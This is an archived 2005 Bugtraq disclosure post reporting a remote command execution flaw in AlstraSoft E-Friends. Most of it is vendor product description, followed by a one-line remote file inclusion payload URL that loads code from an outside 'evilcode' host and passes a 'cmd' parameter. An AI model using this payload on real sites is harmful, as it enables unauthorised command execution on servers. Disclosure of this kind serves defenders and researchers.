lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050924104535.18973.qmail@securityfocus.com>
Date: 24 Sep 2005 10:45:35 -0000
From: khc@...mail.org
To: bugtraq@...urityfocus.com
Subject: AlstraSoft E-Friends Remote Command Exucetion


AlstraSoft E-Friends Remote command exucetion

Site : http://www.alstrasoft.com/efriends.htm

Description : 

AlstraSoft E-Friends is an online social networking software that allows you to start your own site just like Friendster and Tribe.net. The E-Friends software allows members to connect to people in their personal networks and community, creating a new online interactive resource that is based on a trusted network of friends and associates on the internet.

Members can use this abundant network to make friends, find their love ones, locate jobs, buy and sell stuff, locate a roommate, and accomplish much more with the help of groups and individuals who they know and share the same interests.

With our new 4.0 release, you can now start a profitable social networking business by creating custom membership packages using Paypal payment gateway. In addition, we have added several new exciting features including online blog, forums, text-based chat, events and many more! Enhancements are also added to the admin backend and with our integrated banner ads system, you can earn extra income by publishing paid banner ads on your E-Friends site.

Vulnerable: http://www.ownz.net/index.php?mode=http://evilcode?&cmd=

Solution : no :P

Contact : khc@...mail.org

Kurdish Hackers Clan!



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ